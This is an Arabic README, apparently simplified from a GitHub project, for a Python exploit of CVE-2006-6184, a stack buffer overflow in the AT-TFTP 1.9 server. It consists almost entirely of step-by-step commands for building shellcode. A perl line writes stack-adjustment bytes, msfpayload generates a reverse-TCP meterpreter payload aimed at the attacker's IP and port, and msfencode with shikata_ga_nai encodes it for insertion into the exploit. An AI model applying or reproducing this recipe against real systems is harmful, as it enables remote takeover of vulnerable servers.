
نسخة مبسطة من https://github.com/shauntdergrigorian/cve-2006-6184
هذا استغلال قائم على بايثون ومستقل لـ CVE-2006-6184. يثير هذا الاستغلال تجاوز سعة المخزن المؤقت المستند إلى المكدس في خادم Allied Telesyn TFTP (AT-TFTP) 1.9، وربما الإصدارات السابقة، مما يسمح للمهاجمين عن بُعد بالتسبب في رفض الخدمة أو تنفيذ كود تعسفي.
ألم تظن أن الأمر سيكون بهذه السهولة؟ يجب تخصيص الحمولة لتشمل عنوان IP الخاص بك ومنفذ الاستماع، لذا ستحتاج إلى توليدها بنفسك. للقيام بذلك، استخدم الخطوات التالية:
1.) أدخل ما يلي لإنشاء ملف سداسي عشري للمبلغ الذي يجب طرحه من مؤشر المكدس (3500):
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) بعد ذلك، استخدم الأمر التالي لإنشاء حمولة مترجم مترابطة (staged meterpreter):
msfpayload windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
3.) ثم، ادمج الملفين اللذين أنشأتهما للتو.
cat stackadj payload > shellcode
4.) أخيرًا، دعنا نتخلص من الأحرف السيئة.
cat shellcode | msfencode -b '\x00' -e x86/shikata_ga_nai -t python
أدخل المخرجات كقيمة لمتغير "payload".